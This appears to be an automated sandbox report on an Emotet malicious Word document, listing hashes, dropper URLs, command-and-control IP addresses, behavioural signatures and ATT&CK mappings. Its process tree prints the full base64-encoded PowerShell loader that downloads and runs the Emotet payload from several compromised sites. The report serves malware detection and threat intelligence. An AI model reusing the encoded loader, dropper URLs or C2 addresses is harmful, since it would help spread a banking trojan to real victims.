emotet | 815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1

General

Target

emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc
Size

169KB
MD5

0844a5ac279d31e0d7915770bdebe16e
SHA1

08febfb1becbf3d793ac8c61a7640d4f76f80f34
SHA256

815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1
SHA512

66fab8a4dc956cfb2fbd2b17758b3c7ab274e638403124603b7dfef9c59dbff9aed91d8c4f81c3d31a2c8a3eedead4ed16af81695fc2e2bb16dea8c43fbe8565

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://mossfs.com.au/wp-content/fVrTuWOb/

exe.dropper

https://rtisistemas.com.br/jdetsob/Ov3a8106w4g7x17030547/

exe.dropper

http://slbqms.co.ls/cgi-bin/CHrsuXU/

exe.dropper

http://sertcom.net/_vti_bin/LiUoBmTHW/

exe.dropper

http://skpsoft.com/wp-admin/YnsFh/

Extracted

Family

emotet

C2

177.37.81.212:443

74.207.230.187:8080

190.164.75.175:80

87.252.100.28:80

105.209.239.55:80

163.172.107.70:8080

37.208.106.146:8080

24.157.25.203:80

212.112.113.235:80

140.207.113.106:443

75.139.38.211:80

192.210.217.94:8080

46.49.124.53:80

75.127.14.170:8080

87.106.231.60:8080

139.59.12.63:8080

181.167.35.84:80

201.214.108.231:80

74.208.173.91:8080

189.146.1.78:443

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2044 500 powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2044	500	powersheLL.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powersheLL.exeopenfiles.exe

pid	process
2044	powersheLL.exe
2044	powersheLL.exe
2044	powersheLL.exe
3320	openfiles.exe
3320	openfiles.exe
3320	openfiles.exe
3320	openfiles.exe
3320	openfiles.exe
3320	openfiles.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

49.exe

description	pid	process	target process
PID 3860 wrote to memory of 3320	3860	49.exe	openfiles.exe
PID 3860 wrote to memory of 3320	3860	49.exe	openfiles.exe
PID 3860 wrote to memory of 3320	3860	49.exe	openfiles.exe

Emotet Payload 2 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/3860-8-0x0000000000650000-0x000000000065C000-memory.dmp	emotet
behavioral2/memory/3320-11-0x00000000005A0000-0x00000000005AC000-memory.dmp	emotet

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

WINWORD.EXE49.exeopenfiles.exe

pid	process
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3952	WINWORD.EXE
3860	49.exe
3860	49.exe
3320	openfiles.exe
3320	openfiles.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3952 WINWORD.EXE
3952 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 2044 powersheLL.exe
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

14 2044 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

49.exeopenfiles.exe

pid process

3860 49.exe
3320 openfiles.exe
Drops file in System32 directory 1 IoCs

Processes:

49.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\CastingShellExt\openfiles.exe 49.exe

description	pid	process
Token: SeDebugPrivilege	2044	powersheLL.exe

flow	pid	process
14	2044	powersheLL.exe

pid	process
3860	49.exe
3320	openfiles.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\CastingShellExt\openfiles.exe	49.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_815a79a9d7ce70977948ef24171dac2cc41dd3a3d494f2b95eb9b08c355bb5e1_2020-07-29__001342._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:3952

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABZAFEAUABBAE8AYQBzAHIAPQAnAFkARABOAFIATQByAGoAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AFIAYABpAFQAWQBwAFIAYABPAFQATwBgAEMAYABvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABEAEIAQQBKAEcAawBtAGUAIAA9ACAAJwA0ADkAJwA7ACQATgBGAEQASQBNAGQAaABjAD0AJwBQAEEARQBIAFQAbABwAGMAJwA7ACQAVwBSAFkAUwBZAHMAeABpAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABEAEIAQQBKAEcAawBtAGUAKwAnAC4AZQB4AGUAJwA7ACQAVwBDAFkAQQBHAHkAeQBlAD0AJwBNAFAASgBaAEQAagBiAHIAJwA7ACQAWABLAEQAQQBLAGIAegBzAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABJAEUATgB0ADsAJABHAEQAVwBHAFUAZwBsAGQAPQAnAGgAdAB0AHAAcwA6AC8ALwBtAG8AcwBzAGYAcwAuAGMAbwBtAC4AYQB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAVgByAFQAdQBXAE8AYgAvACoAaAB0AHQAcABzADoALwAvAHIAdABpAHMAaQBzAHQAZQBtAGEAcwAuAGMAbwBtAC4AYgByAC8AagBkAGUAdABzAG8AYgAvAE8AdgAzAGEAOAAxADAANgB3ADQAZwA3AHgAMQA3ADAAMwAwADUANAA3AC8AKgBoAHQAdABwADoALwAvAHMAbABiAHEAbQBzAC4AYwBvAC4AbABzAC8AYwBnAGkALQBiAGkAbgAvAEMASAByAHMAdQBYAFUALwAqAGgAdAB0AHAAOgAvAC8AcwBlAHIAdABjAG8AbQAuAG4AZQB0AC8AXwB2AHQAaQBfAGIAaQBuAC8ATABpAFUAbwBCAG0AVABIAFcALwAqAGgAdAB0AHAAOgAvAC8AcwBrAHAAcwBvAGYAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AWQBuAHMARgBoAC8AJwAuACIAcwBwAGwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABVAEgARABXAEcAeQBtAGMAPQAnAFUAVgBVAEcAWABvAGgAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBHAE8AVQBYAG0AbgB0ACAAaQBuACAAJABHAEQAVwBHAFUAZwBsAGQAKQB7AHQAcgB5AHsAJABYAEsARABBAEsAYgB6AHMALgAiAGQAYABvAFcATgBsAG8AYABBAGAARABGAGkAbABlACIAKAAkAFkARwBPAFUAWABtAG4AdAAsACAAJABXAFIAWQBTAFkAcwB4AGkAKQA7ACQATQBOAFkARgBLAGgAbgB2AD0AJwBYAFAAVwBVAEYAYgBxAHUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABXAFIAWQBTAFkAcwB4AGkAKQAuACIATABlAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADUAOQA1ADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGUAYQB0AGUAIgAoACQAVwBSAFkAUwBZAHMAeABpACkAOwAkAFoAVgBaAE8ARQBlAGUAaQA9ACcARwBSAFUAUwBYAGsAcABkACcAOwBiAHIAZQBhAGsAOwAkAFAAWABWAEoATABrAG8AbgA9ACcAWgBQAFMAUABEAHQAaQBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AWgBVAEEARwB5AHIAcAA9ACcAQwBXAFoASwBRAHgAdABlACcA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
PID:2044

C:\Users\Admin\49.exe
C:\Users\Admin\49.exe
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Drops file in System32 directory
PID:3860

C:\Windows\SysWOW64\CastingShellExt\openfiles.exe
"C:\Windows\SysWOW64\CastingShellExt\openfiles.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:3320

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\49.exe

Download Submit
C:\Users\Admin\49.exe

Download Submit
C:\Windows\SysWOW64\CastingShellExt\openfiles.exe

Download Submit
memory/3320-9-0x0000000000000000-mapping.dmp

Download
memory/3320-11-0x00000000005A0000-0x00000000005AC000-memory.dmp

Filesize
48KB

Download
memory/3860-8-0x0000000000650000-0x000000000065C000-memory.dmp

Filesize
48KB

Download
memory/3952-1-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmp

Filesize
68KB

Download
memory/3952-2-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmp

Filesize
68KB

Download
memory/3952-3-0x0000019FD4F55000-0x0000019FD4F66000-memory.dmp

Filesize
68KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads